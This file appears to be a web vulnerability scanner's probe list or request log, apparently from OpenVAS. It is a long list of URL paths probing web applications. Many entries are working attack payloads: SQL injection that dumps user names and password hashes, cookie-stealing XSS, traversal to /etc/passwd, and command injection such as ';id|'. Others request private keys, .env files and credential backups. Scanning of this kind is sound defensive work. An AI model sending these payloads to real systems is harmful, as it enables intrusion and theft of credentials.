net.sfr.rev.111.112.113.sql
net.sfr.rev.111.112.key
net.sfr.rev.111.112.pem
net.sfr.rev.111.112.sql
net.sfr.rev.111.key
net.sfr.rev.111.pem
net.sfr.rev.111.sql
net.sfr.rev.key
net.sfr.rev.pem
net.sfr.rev.sql
net.sfr.sql
net.sql
nette.micro/?callback=shell_exec&cmd=id&what=-1
newcomment/?ArticleId=\"><script>foo</script>
newfile.txt
news.php
news.php?news_id=4+union+all+select+0,1,2,0x53514c2d496e6a656374696f6e2d54657374
news.php4?nid=-12'+union+select+1,2,0x53514c2d496e6a656374696f6e2d54657374,4,5,6,7,8,9,10,11/*
news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
news/admin/index.php
news/index.php
nmiscgi.pl
non-existent-1470621906
non-existent-916193560
nonexistent.php
nph-mr.cgi?do=loginhelp&configLanguage=english
nph-publish.cgi
nph-publish.cgi_2071965282
nph-publish.cgi_709677974
nqt.php?target=127.0.0.1&queryType=all&portNum=foobar%3Cscript%3Efoo%3C/script%3E
nuxeo/
obm.php
oc-admin/index.php
ods-cgi/odscgi?HTMLFile=../../../../../../../../../../../../../../../etc/passwd
office/ag.cgi
office/ag.exe
oldnews_reader.php
open.php
openwebmail.pl
operations_gui/
order.php?dhaction=check&submit_domain=Register&domain=<script>alert(document.cookie);</script>&ext1=on
owls/glossaries/index.php?file=/etc/passwd
ox.html
page.php
page.php?xPage=<script>alert(document.cookie)</script>
passwiki.php
passwiki.php?site_id=../../../../../../../../../../../../../etc/passwd%00
pem/login/pages/login.jsf
PGPMail.pl
PGPMail.pl_1585048528
PGPMail.pl_429590238
phinx.json
phinx.yaml
phinx.yml
photo.php?id=-9999/**/union/**/select/**/1,2,0x53514c2d496e6a656374696f6e2d54657374--
photo/templates/admin_default/confirm.tpl.php
php_info.php
php-ping.php?count=1+%26+cat%20/etc/passwd+%26&submit=Ping%21
php/index.php
php/login.php
php/mytutos.php
phpinfo.php
phpliteadmin.php
phpThumb.demo.demo.php
phptonuke.php
pivot/index.php
pki/pub/pki?cmd=serverInfo
pls/portal/PORTAL_DEMO.ORG_CHART.SHOW
plugins/fckeditor/_whatsnew.html
plugins/fckeditor/fckeditor.js
plugins/system/shadowbox/min/index.php?g=sb&ad=base&lan=en&play=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
pmwiki.php
Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00
portal/login.php?message=XSS%20Catched%20!%22))%3C/script%3E%3Cscript%3Ealert(/openvasvt/)%3C/script%3E
portfolio_genre.php?id=-67%20union%20select%201,2,0x53514c2d496e6a656374696f6e2d54657374--
Presenter/index.fsp?signout=true
print.php
print.php?page=../../../../../../../../../etc/passwd
printenv
printenv_1797429995
printenv_44459051
printfaq.php?lng=en&pg=1
privatekey.key
prodpage.cfm?CFID=&CFTOKEN=&CategoryID='openvasvt
product.comparision.php?cat=null%20union%20all%20select%201,concat_ws(0x3a,0x4f,0x70,0x65,0x6e,0x56,0x41,0x53),3,4,5%20from%20daype_users_tb%20--&name=GSM
productionnu2/fileuploader.php
productionnu2/report.php
products.php
profil.php?id=1%20<script>foo</script>
profile/index.php
pub/pki?cmd=serverInfo
public.pl
public/code/cp_dpage.php
public/code/index.php
public/telescope
public/view.php?storyid=-1%27%20UNION%20ALL%20SELECT%201,2,132323231,4,5,6,7,8,9,10%23
puttest1.html
puttest1012114801.html
puttest1589205768.html
pwn.php
query?group=/*
quixplorer_2_3/index.php?action=download&dir=&item=../../../../../../../../../etc/passwd&order=name&srt=yes
r.cgi?FILE=../../../../../../../../../../etc/passwd
r.pl?FILE=../../../../../../../../../../etc/passwd
rails/info/properties/
rails/info/routes/
RCS/
read_body.php?mailbox=<script>alert(document.cookie)</script>&passed_id=<script>alert(document.cookie)</script>&startMessage=1&show_more=0
README
readme.html
README.md
README.php
Readme.txt
README.txt
readme.txt
recentservers.xml
recovery/install/
register.php
RELEASE_NOTES.txt
ReleaseNotes.txt
research_display.php?ID=-null+UNiON+ALL+SELECT+null,null,null,0x53514c2d496e6a656374696f6e2d54657374,null,null,null
resources/ckeditor/CHANGES.md
resources/ckeditor/ckeditor.js
resources/fckeditor/_whatsnew.html
resources/fckeditor/fckeditor.js
ress.php?page=../../../../../../../../../etc/passwd%00
results.php?searchtype=\">%3cscript%3ealert('openvasvt121843797')%3b%3c%2fscript%3ecategory&searchterm=OpenVASVT
rev.key
rev.pem
rev.sql
robo3t.json
robo3T.json
robomongo.json
roschedule.php
rtm.log
ru/
s_form.cgi
s_form.cgi_1081986180
s_form.cgi_1789243609
s_form.cgi_693855254
s_form.cgi_851398245
scr/soustab.php
script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=%3C/option%3E%3C/SELECT%3E%3C?phpinfo();?%3E
scripts.php
sdbsearch.cgi?stichwort=anything
search
search_151970048
search_2107940944
search.cgi
search.html
search.php
search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1
search.php?dosearch=true&query=\"><script>alert(document.cookie)</script>
search.php?query=1<script>alert(document.cookie);</script>&mode=all
search.php?query=we+%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&topic=0&limit=30
search.php?searchfor=\"><script>window.alert(document.cookie);</script>
search/show.pl?url=file:/etc/passwd
search=%3Cscript%3Ealert('XSS')%3C/script%3E
searchblox/search.html
sendcard.php?view=1&id=%27openvasvt
sensorview.php
server.key
server/php/upload.class.php
server/php/UploadHandler.php
service.cnf
service/index_pri.php
services/help/?module=horde&show=about
services/help/?module=horde&show=menu
services/non-existent
services/Version?method=getVersion
services/Version/getVersion
servlet/one2planet.infolet.InfoServlet?page=<script>foo</script>
session/login.php
setseed-hub/
settings.php
settings.php.backup
settings.php.bak
settings.php.bkp
settings.php.copy
settings.php.old
settings.php.orig
settings.php.save
settings.php.swp
settings.php.temp
settings.php.tmp
settings.php~
settings.py
setup.php
setup.php3?next=1
setup/index.php
setup/install.php
setup/setup.php
sfr.key
sfr.pem
sfr.sql
sftp-config.json
shell/sitecore.version.xml
shop.cgi
shop.pl/page=;cat%20shop.pl|
shopper.cgi?newpage=../../../../../../etc/passwd
shopplus.cgi
shopplus.cgi_1368008666
shopplus.cgi_979877740
shoutbox.php
show_profile.php
showcase.action
showcat.php?cat=1'
showcategory.php?cid=-101+union+select+12345678987654321,12345678987654321,3,4,5--
showcategory.php?cid=9type=1&keyword=Pouya&radio=%3E%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
showHome.do
showproduct.php?product=1'
showtheme.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,CONCAT(name,%200x3a,%20passwd_hash),NULL,5,6,7%20FROM%20users%23
signin
signin.php
signing_system-admin/index.php
site.php
site.sql
site/index.php/admin/login/
site/login.php
sitemanager.xml
sitemap.php?id_site=<script>alert(/openvasvt/)</script>
sitemap.xml
sites/all/modules/ckeditor/CHANGES.md
sites/all/modules/ckeditor/ckeditor.js
sites/all/modules/fckeditor/_whatsnew.html
sites/all/modules/fckeditor/fckeditor.js
sites/all/modules/fckeditor/fckeditor/_whatsnew.html
sites/all/modules/fckeditor/fckeditor/fckeditor.js
sites/default/files/.ht.sqlite
sites/default/private/files/backup_migrate/scheduled/test.txt
skins/default.php?dir_inc=../etc/passwd%00
skins/default.php?dir_inc=/etc/passwd%00
smarty.php
snpfiltered.pl?t=c&u=<script>foo</script>
software-description.php?id=-5%20union%20all%20select%201,2,1234567890987654321,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
source/index.php
spip.php
spywall/login.php
sql.sql
src/apps/pom.xml
src/index.php
src/login.php
src/main.php
src/pom.xml
src/src/site/xdoc/index.xml
src/Symfony/Component/Console/CHANGELOG.md
sscd_suncourier.pl
sscd_suncourier.pl_320575721
sscd_suncourier.pl_666321881
ssl_check.php
star57.cgi?download=;id|
start
start/index.php
startPage
static/index.html
status.php
status.php3
story.pl?next=../../../../../etc/passwd%00
struts-cookbook/example/HelloWorld.action
struts-cookbook/index.action
struts-cookbook/showcase.action
struts-cookbook/Welcome.do
struts-examples/example/HelloWorld.action
struts-examples/index.action
struts-examples/showcase.action
struts-examples/Welcome.do
struts2-basic/example/HelloWorld.action
struts2-basic/index.action
struts2-basic/showcase.action
struts2-basic/Welcome.do
struts2-blank/example/HelloWorld.action
struts2-core-apidocs/help-doc.html
struts2-core-apidocs/index-all.html
struts2-core-apidocs/overview-summary.html
struts2-mailreader/Welcome.do
struts2-portlet/example/HelloWorld.action
struts2-portlet/index.action
struts2-portlet/showcase.action
struts2-portlet/Welcome.do
struts2-rest-showcase/example/HelloWorld.action
struts2-rest-showcase/index.action
struts2-rest-showcase/showcase.action
struts2-rest-showcase/Welcome.do
struts2-showcase/showcase.action
stuworkdisplay.php?ID=-1)%20UNION%20ALL%20SELECT%200x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10,11%23
style-underground/search
styles.php?toroot=/etc/passwd%00
symfony/web/index.php/auth/login
symphony/
system/admin/modules.php
system/rss.php?id=-1%20union%20select%201,22222222222,3,4,5,6,7,8,0x53514c2d496e6a656374696f6e2d54657374;
SystemInfo
tao/install/
team.rc5-72.php
telescope
telescope/requests
temp.sql
Templates/default/index_logged.php?main_loaded=1&cur_module=/etc/passwd
templates/system/css/editor.css
test.php
test.php?mode=phpinfo
themes/admin/default/modules/show.php
themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3Ealert%28/openvasvt/%29;%3C/script%3E
themes/program/themesettings.inc.php?themesdir=/etc/passwd%00
thread.php
tiki-index.php
tiki-install.php
title.html
titleBar.php
tmpl/news_main.htm
tombstone.cfm?ProfileID=<script>foo</script>
tools.php?file_id=reset_password
topic.php?filename=1%22%3e%3cscript%3ealert(%22%20%2b%20vtstrings%5b%22lowercase_rand%22%5d%20%2b%20%22)%3c%2fscript%3e
translate.sql
triton/login/pages/loginPage.jsf
typo3_src/ChangeLog
typo3/index.php
typo3/sysext/opendocs/composer.json
typo3/sysext/recordlist/composer.json
typo3/sysext/sys_note/composer.json
typo3/sysext/t3editor/composer.json
update.php
upload.php
upload/account-login.php
upload/index.php
upstnt.php?zid=1&lid=1&cartid='
urheber.php?name=../../../../../../../../../../etc/passwd%00
user.cgi?cmd=show&page=/../../../etc/passwd
user.php
user/index.php
user/login
userlogin!default.action
userlogin!doDefault.action
users.sql
users/login.php
usr/extensions/get_tree.inc.php?GLOBALS[root_path]=/etc/passwd%00
utils.js
v1/settings/first-login
v3/settings/first-login
vendor/plugins/fckeditor/public/javascripts/_whatsnew.html
vendor/plugins/fckeditor/public/javascripts/fckeditor.js
viart_shop.xml
view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
view_user.php?list=1&letter=&sort_by='select
view.php?article_id=-1%20UNION%20ALL%20SELECT%201,2,3,0x53514c2d496e6a656374696f6e2d54657374,5,6,7,8,9
view.php?id=-1+union+select+0x53514c2d496e6a656374696f6e2d54657374,2,3,4,5,6,7,8,9,10+from+test_category&mytable=test_category
view/TWiki/WebHome
viewcvs.cgi/?cvsroot=<script>foo</script>
viewer
viewfaqs.php
viewpic.php?id=7&conversation_id=<script>foo</script>&btopage=0
views/login
viewstory.php
viewvc.cgi/
viewvc/
viralator.cgi
viralator.cgi_1247142494
viralator.cgi_1828062527
vpasswd.cgi
vpasswd.cgi_1051800675
vpasswd.cgi_461946153
WackoWiki
wcf/acp/dereferrer.php?url=javascript:alert(document.cookie);
web_reports/cgi-bin/InfoStation.cgi?mod=login&func=login&lang_code=en
Web_Store/web_store.cgi?page=../../../../../../etc/passwd%00.html
WEB-INF../web.xml
web-inf../web.xml
WEB-INf./web.xml
WEB-INF./web.xml
web-inf./web.xml
WEB-INF/local.properties
WEB-INF/web.xml
web-inf/web.xml
WEB-INF/webapp.properties
web.config
web.xml
Web/?
web/?wicket:bookmarkablePage=:org.geoserver.web.AboutGeoServerPage
web/app_dev.php/_configurator/step/0
web/guest
web/help.php
web/login
web/magmi.php
webacc?User.interface=/../webacc/wml
webadmin.php?show=%2Fetc%2Fpasswd
webapp.properties
webapp/home.html?0
webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD
webFileBrowser.php
weblibs.pl
webplus?about
webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd
Welcome.do
welcome.do
welcome/index.html
wiki.cgi
wiki.php
wiki.php/<script>foo</script>
wiki/index.php
WikiHome
WinSCP.ini
winscp.ini
wizard/index.php?type=';phpinfo();//
wizard/url.php?${phpinfo()}=1
wonderdesk.cgi
wp-admin/install.php
wp-admin/setup-config.php
wp-config.php.backup
wp-config.php.bak
wp-config.php.bkp
wp-config.php.copy
wp-config.php.old
wp-config.php.orig
wp-config.php.save
wp-config.php.swp
wp-config.php.temp
wp-config.php.tmp
wp-config.php~
wp-content/plugins/ckeditor-for-wordpress/ckeditor/CHANGES.md
wp-content/plugins/ckeditor-for-wordpress/ckeditor/ckeditor.js
wp-content/plugins/fckeditor-for-wordpress/fckeditor/_whatsnew.html
wp-content/plugins/fckeditor-for-wordpress/fckeditor/fckeditor.js
wp-links-opml.php
wp-login.php
wrx.cgi
ws_ftp.ini
WS_FTP.INI
WS_FTP.ini
wu-moadmin.php?db=admin&action=listRows&collection=fdsa&find=array();phpinfo();
WW/cwiki.apache.org/WW/guides.html
WW/cwiki.apache.org/WW/home.html
www/admin/index.php
wwwboard.html
x_news.php
xymon.html
YaBB.pl
zboard.php?id=gallery&sn1=ALBANIAN%20RULEZ='%3E%3Cscript%3Efoo%3C/script%3E
zml.cgi?file=../../../../../../../../../../../../etc/passwd%00
zp-core/admin.php?a="><script>alert(/xss-test/)</script>
_/WEB-INF/web.xml
_conf/?action=delsettings&group=..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg&picdir=Sample_Gallery&what=descriptions
_head.php?_zb_path=../../../../../../../../../../etc/passwd%00
_maincfgret.cgi
_maincfgret.cgi_501377445
_maincfgret.cgi_896583524
_whatsnew.html
;/web-inf/web.xml
;/WEB-INF/web.xml
?controller=auth&action=login
?controller=user&action=login
?Mode=debug
?p=<script>alert(/xss-test/)</script>
?page=login
?page=login&action=about
?page=shop/cart&func=cartAdd&product_id='
?q=0&l=0
?upload_to=
?view=home
.//WEB-INF/web.xml
.//web-inf/web.xml
./WEB-INF/web.xml
./web-inf/web.xml
.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
.%00/WEB-INF/web.xml
.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
.access
.bash_history
.bashrc
.bzr/branch-format
.bzr/README
.config.inc.php.backup
.config.inc.php.bak
.config.inc.php.bkp
.config.inc.php.copy
.config.inc.php.old
.config.inc.php.orig
.config.inc.php.save
.config.inc.php.swp
.config.inc.php.temp
.config.inc.php.tmp
.config.inc.php~
.config.php.backup
.config.php.bak
.config.php.bkp
.config.php.copy
.config.php.old
.config.php.orig
.config.php.save
.config.php.swp
.config.php.temp
.config.php.tmp
.config.php~
.configuration.php.backup
.configuration.php.bak
.configuration.php.bkp
.configuration.php.copy
.configuration.php.old
.configuration.php.orig
.configuration.php.save
.configuration.php.swp
.configuration.php.temp
.configuration.php.tmp
.configuration.php~
.coveralls.yml
.dbshell
.DS_Store
.env
.env_1
.env_baremetal
.env_hosted
.env_local
.env_production
.env_sample
.env_staging
.env.backup
.env.bak
.env.dev
.env.dev.local
.env.development.local
.env.example
.env.live
.env.local
.env.old
.env.prod
.env.prod.local
.env.production
.env.production.local
.env.save
.env.stage
.env.www
.esmtprc
.FBCIndex
.ftpconfig
.git-credentials
.git/config
.git/description
.git/FETCH_HEAD
.git/HEAD
.git/info/exclude
.git/info/refs
.git/logs/HEAD
.git/ORIG_HEAD
.git/sourcetreeconfig
.hg/branch
.hg/branch.cache
.hg/branchheads.cache
.hg/hgrc
.hg/last-message.txt
.hg/requires
.hg/sourcetreeconfig
.hg/undo.branch
.hg/undo.desc
.htaccess
.htpasswd
.htpasswd-all
.htpasswd-users
.htpasswds
.htuser
.htusers
.idea/WebServers.xml
.index.php.backup
.index.php.bak
.index.php.bkp
.index.php.copy
.index.php.old
.index.php.orig
.index.php.save
.index.php.swp
.index.php.temp
.index.php.tmp
.index.php~
.jsp/WEB-INF/web.xml
.jsp/web-inf/web.xml
.local
.mysql_history
.passwd
.php_cs.cache
.php-cs-fixer.cache
.production
.profile
.psql_history
.remote
.remote-sync.json
.settings.php.backup
.settings.php.bak
.settings.php.bkp
.settings.php.copy
.settings.php.old
.settings.php.orig
.settings.php.save
.settings.php.swp
.settings.php.temp
.settings.php.tmp
.settings.php~
.sh_history
.sqlite_history
.ssh/authorized_keys
.ssh/config
.ssh/id_dsa
.ssh/id_dsa.pub
.ssh/id_dss
.ssh/id_dss.pub
.ssh/id_ecdsa
.ssh/id_ecdsa.pub
.ssh/id_ed25519
.ssh/id_ed25519.pub
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/identity
.ssh/known_hosts
.svn/all-wcprops
.svn/dir-prop-base
.svn/entries
.svn/wc.db
.vscode/ftp-sync.json
.vscode/sftp.json
.wp-config.php.backup
.wp-config.php.bak
.wp-config.php.bkp
.wp-config.php.copy
.wp-config.php.old
.wp-config.php.orig
.wp-config.php.save
.wp-config.php.swp
.wp-config.php.temp
.wp-config.php.tmp
.wp-config.php~
/../WEB-INF/web.xml
/../web-inf/web.xml
/WEB-INF/web.xml
/web-inf/web.xml
#/sign-in
#browse/welcome
#welcome
%20..\\WEB-INF/web.xml
%20..\\web-inf/web.xml
%2557EB-INF/web.xml
%2e/WEB-INF/web.xml
%u002e/WEB-INF/web.xml
1.sql
111.key
111.pem
111.sql
112.key
112.pem
112.sql
113.112.111.key
113.112.111.pem
113.112.111.rev.key
113.112.111.rev.pem
113.112.111.rev.sfr.key
113.112.111.rev.sfr.net.key
113.112.111.rev.sfr.net.pem
113.112.111.rev.sfr.net.sql
113.112.111.rev.sfr.pem
113.112.111.rev.sfr.sql
113.112.111.rev.sql
113.112.111.sql
113.112.key
113.112.pem
113.112.sql
113.key
113.pem
113.sql
114.113.112.111.key
114.113.112.111.pem
114.113.112.111.rev.key
114.113.112.111.rev.pem
114.113.112.111.rev.sfr.key
114.113.112.111.rev.sfr.net.key
114.113.112.111.rev.sfr.net.pem
114.113.112.111.rev.sfr.net.sql
114.113.112.111.rev.sfr.pem
114.113.112.111.rev.sfr.sql
114.113.112.111.rev.sql
114.113.112.111.sql
114.113.112.key
114.113.112.pem
114.113.112.sql
114.113.key
114.113.pem
114.113.sql
114.key
114.pem
114.sql
404.php?url=1%3Cscript%3Ealert(%27openvasvt%27)%3C/script%3E
about
about-show.do
about.php
about/
Account/LogIn
account/login
acp/index.php
actuator/gateway/routes
add_url.htm?node=%3Cscript%3Ealert('XSS')%3C/script%3E
adframe.php?refresh=example.com'<script>alert(document.cookie)</script>
adm_program/index.php
admin
admin_area/login.php
admin_login.html
admin_panel/index.php
admin.php
admin/
admin/admin.php
admin/admin.php?sid='
admin/admin.php?sid=0'
admin/ckeditor/CHANGES.md
admin/ckeditor/ckeditor.js
admin/config.php
admin/fckeditor/_whatsnew.html
admin/fckeditor/fckeditor.js
admin/helpfiles/AdminHelp.php
admin/htmleditor/_whatsnew.html
admin/htmleditor/fckeditor.js
admin/index.php
admin/index.php?eventid=-1+union+all+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6--
admin/index.php?login
admin/install
admin/install.php
admin/lib/gradient/gradient.php?tam=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd%00
admin/libraries/ajaxfilemanager/ajax_create_folder.php
admin/login
admin/login-default.do
admin/login.html
admin/login.jsp
admin/login.php
admin/login/
admin/lost-pass.php
admin/moderation.php
admin/password_check_token.php?f_email=1&token=%22%3E%3Cscript%3Ealert%28/xss-test/%29;%3C/script%3E
admin/setup.php
admin/system
admin/welcome.php
admin#/mode
adminer.php
administration/profiles.php
aeNovo1.mdb
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
afdrukken.php
ag.cgi
ag.exe
agenda.php3
airflow.cfg
ajaxfilemanager/ajax_create_folder.php
ajaxp_backend.php?page=-1+union+select+1,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7--
alerts.php
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
alya.cgi
alya.cgi_1407309590
alya.cgi_831494978
andromeda.php
ang/index.php
ans.pl?p=../../../../../usr/bin/id|&blah
ans/ans.pl?p=../../../../../usr/bin/id|&blah
apc.php
apcinfo.php
apcu.php
apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd%%0000.html&passurl=/category/
api/appconfiguration
api/v1/appconfiguration
api/v2/appconfiguration
api/v3/appconfiguration
apidocs/index.html
app.php
app/config.neon
app/config/config_dev.yml
app/config/config_prod.yml
app/config/config_test.yml
app/config/config.neon
app/config/config.yml
app/config/parameters.yml
app/config/security.yml
app/etc/local.xml
app/kibana
app/login.php
app/logs/dev.log
app/logs/prod.log
appconfiguration
application/configs/application.ini
application/login/login.html
applicationengine/
ApplicationEngine/
artmedic_links5/index.php?id=index.php
assets/plugins/mp3_id/mp3_id.php
athenareg.php?pass=%20;id
auth/login
authentication_index.php?PGV_BASE_DIRECTORY=http://xxxxxxx/
authentication/login
awstats.pl?framename=mainright
awstatstotals.php
axis2-admin/
axis2-web/index.jsp
backend.php
backend/plugin/Registration/index.php
backend/start/index.php
backup.sql
base/index.php
basilix.php?is_ssl=1
bb_admin.php
bb_func_txt.php?pathToFiles=/etc/passwd%00
beerxml.php?r=null%20union%20select%201,2,3,4,5,0x53514c2d496e6a656374696f6e2d54657374,7,8,9,10,11
beta/index.html
bible.php
bin/index.php
bin/view/foswiki/WebHome
bin/view/TWiki/WebHome
bizdb1-search.cgi
bizdb1-search.cgi_109672035
bizdb1-search.cgi_690592069
blob.php
blogAdmin/jobs.php?j=login&p=1%27or%271&%27=1
blogs/admin.php
board.php?FID=%3Cscript%3Efoo%3C/script%3E
breakcal/calendar.cgi
browse.php?pk=-1%20union%20select%201234567,2--
cachemgr.cgi
cachemgr.cgi_1726251222
cachemgr.cgi_1731356644
cal_week.php?op=week&catview=999'
calendar_scheduler.php?start=\"><script>alert(document.cookie)</script>
calendar.php
calendar.php?year=2004&month=<script>foo</script>&day=01
cart.php
catalog.php?action=category_show&id='
category.php
cb_install/
cbag/ag.cgi
cbag/ag.exe
cbdb/db.exe
cbgrn/grn.exe
cbmw/mw.exe
centreon/install/setup.php
CFIDE/probe.cfm
ma.dyn.key
ma.dyn.ip.key
ma.dyn.ip.pem
ma.dyn.ip.sql
ma.dyn.pem
ma.dyn.sql
ma.key
ma.pem
ma.sql
cgi-bin/cbag/ag.cgi
cgi-bin/cbag/ag.exe
cgi-bin/config.cgi
cgi-bin/view/TWiki/WebHome
cgi.rb
cgi.rb_2069471998
cgi.rb_2072024709
cgi/tseekdir.cgi?location=/etc/passwd%00
cgicso?query=<script>alert('foo')</script>
cgicso?query=AAA
cgiwrap
cgiwrap_1388905770
cgiwrap_807985736
ChangeLog
CHANGELOG
changelog
changelog.txt
CHANGES
CHANGES.md
charts.php
chat/send.php?css=%3cscript%3ealert(openvasvt480265941)%3c%2fscript%3e
check_mk/login.py
check_user_id.php?user_id=<script>foo</script>
chgpwd.php
chklogin.cgi
chksession.cgi
city.php
ckeditor.js
ckeditor/CHANGES.md
ckeditor/ckeditor.js
classifieds/Site_Admin/admin.php
clientscript/ckeditor/CHANGES.md
clientscript/ckeditor/ckeditor.js
clientscript/fckeditor/_whatsnew.html
clientscript/fckeditor/fckeditor.js
clwarn.cgi
cm/newui/wiki/index.jsp
cms/website.php?id=/de/index.htm&admin=login
comment.php?id=-1%27%20UNION%20ALL%20SELECT%20NULL,0x53514c2d496e6a656374696f6e2d54657374,3,4%20FROM%20cblog_users%23
comments.php?image_id=1'
comments.php?y=05&m=01&entry=../../../../../../../etc/passwd
common/login.php?default_language=/../../supporter/timer.js%00
complete-modules/modules/forcedownload/force_download.php
composer.json
composer.json-dist
composer.json.dist
composer.lock
config-browser/index
config-browser/index.action
config.development.json
config.inc.php.backup
config.inc.php.bak
config.inc.php.bkp
config.inc.php.copy
config.inc.php.old
config.inc.php.orig
config.inc.php.save
config.inc.php.swp
config.inc.php.temp
config.inc.php.tmp
config.inc.php~
config.neon
config.php.backup
config.php.bak
config.php.bkp
config.php.copy
config.php.old
config.php.orig
config.php.save
config.php.swp
config.php.temp
config.php.tmp
config.php~
config.production.json
config.xml.sav
config/database.yml
config/databases.yml
Config/diff.php?file=;id&new=1&old=2
config/packages/security.yaml
configs/application.ini
configuration.php.backup
configuration.php.bak
configuration.php.bkp
configuration.php.copy
configuration.php.old
configuration.php.orig
configuration.php.save
configuration.php.swp
configuration.php.temp
configuration.php.tmp
configuration.php~
contao/install
contao/install.php
content.html
content.php
content.php?get_action=display_doc&doc_file=CREDITS
control/main
control/uk/publish/category
core/config/databases.yml
core/editor.php?editor_insert_bottom=/etc/passwd
core/includes/gfw_smarty.php
Count.cgi?align=topcenter
cvs.php
CVS/Entries
CVS/Root
cvsweb.cgi/
data.sql
data/adminusers.csv
data/nanoadmin.php
database.sql
database/_sessions/
databases.yml
dataface_info.php
db_backup.sql
db.exe
db.sql
db/budget.sqlite
db/users.dat
dbdump.sql
dcshop.cgi
dcshop.cgi_483182820
dcshop.cgi_5518369
dcshop.pl
dcshop.pl_1463499405
dcshop.pl_1627197598
dyn.key
dyn.ip.key
dyn.ip.pem
dyn.ip.sql
dyn.pem
dyn.sql
DEADJOE
Default.aspx
default.cfm?Mode=debug
default.cfml?Mode=debug
deployment-config.json
desktop.php
details_view.php?event_id=1&date=2000-12-01&view=month&loc=loc1&page_info_message=<script>alert(/xss-test/)</script>
dezie/db.exe
dig.php?ns=||cat%20/etc/passwd&host=example.org&query_type=NS&status=digging
directory.php?dir=%3Bcat%20/etc/passwd
display.php?filename=<script>alert('openvasvt')</script>
do/view/TWiki/WebHome
doc/catalogue.html
doc/index.html
docbuilder/top.php
docs/distribution/tour_page1.htm
docs/docs/guides.html
docs/docs/home.html
docs/docs/index.html
docs/docs/struts2-core-apidocs/help-doc.html
docs/docs/struts2-core-apidocs/index-all.html
docs/docs/struts2-core-apidocs/overview-summary.html
docs/docs/WW/cwiki.apache.org/WW/guides.html
docs/docs/WW/cwiki.apache.org/WW/home.html
docs/guides.html
docs/home.html
docs/index.html
docs/readme.txt
docs/struts2-core-apidocs/help-doc.html
docs/struts2-core-apidocs/index-all.html
docs/struts2-core-apidocs/overview-summary.html
docs/WW/cwiki.apache.org/WW/guides.html
docs/WW/cwiki.apache.org/WW/home.html
doesnt_exist/
doku.php
domcfg.nsf
down.php
download_file.php
download.php
download.php?file=etc/passwd
downloader/
downloadfile.php
downlot.php?file=../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
dsweb/HomePage
dump.sql
e107_admin/admin.php
easymsgb.pl?print=|id|
edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;id;%20
editor.php
editor/_whatsnew.html
editor/CHANGES.md
editor/ckeditor.js
editor/fckeditor.js
edlink.php?linkid=-1%27%20union%20all%20select%201,2,3,4,0x53514c2d496e6a656374696f6e2d54657374%27--
elfinder.html
email.php?forum_contact=\"><script>foo</script>
EmployeeSearch.cc
en/index.html
en/neoclassic/login/login
en/StartingPoints
engine/inc/version.info
engine/preview.php
env.111
env.112
env.113
env.113.112
env.113.112.111
env.113.112.111.rev
env.113.112.111.rev.sfr
env.113.112.111.rev.sfr.net
env.114
env.114.113
env.114.113.112
env.114.113.112.111
env.114.113.112.111.rev
env.114.113.112.111.rev.sfr
env.114.113.112.111.rev.sfr.net
env.ma
env.ma.dyn
env.ma.dyn.ip
env.dyn
env.dyn.ip
env.ip
env.ip.dyn
env.ip.dyn.ma
env.net
env.net.sfr
env.net.sfr.rev
env.net.sfr.rev.111
env.net.sfr.rev.111.112
env.net.sfr.rev.111.112.113
env.net.sfr.rev.111.112.113.114
env.rev
env.sfr
error.php?err=404
error500.html
eshop.pl/seite=;cat%20eshop.pl|
ess.do
etc/users.gdb
evalsmsi.php
evoadm.php
example/HelloWorld.action
example/upload.php
extensions/FCKeditor/_whatsnew.html
extensions/FCKeditor/fckeditor.js
extensions/FCKeditor/fckeditor/_whatsnew.html
extensions/FCKeditor/fckeditor/fckeditor.js
extplorer.xml
extra/image.php
extras
farcry/core/webtop/install/index.cfm
favicon.ico
fckeditor.js
fckeditor/_whatsnew.html
FCKeditor/_whatsnew.html
fckeditor/fckeditor.js
FCKeditor/fckeditor.js
feed.php
feed/
FileZilla.xml
filezilla.xml
filter.php?dbtable=Accounts&dbfield=Password
firstvisit.php
flsummary.pl
fm.php
fom.cgi?cmd=<script>foo</script>&file=1&keywords=vt-test
FormMail.cgi
formmail.pl
FormMail.pl
formmail.pl.cgi
forms/login.fcc
forum_2.php?msg=10&return=<script>foo</script>
forum_answer.php
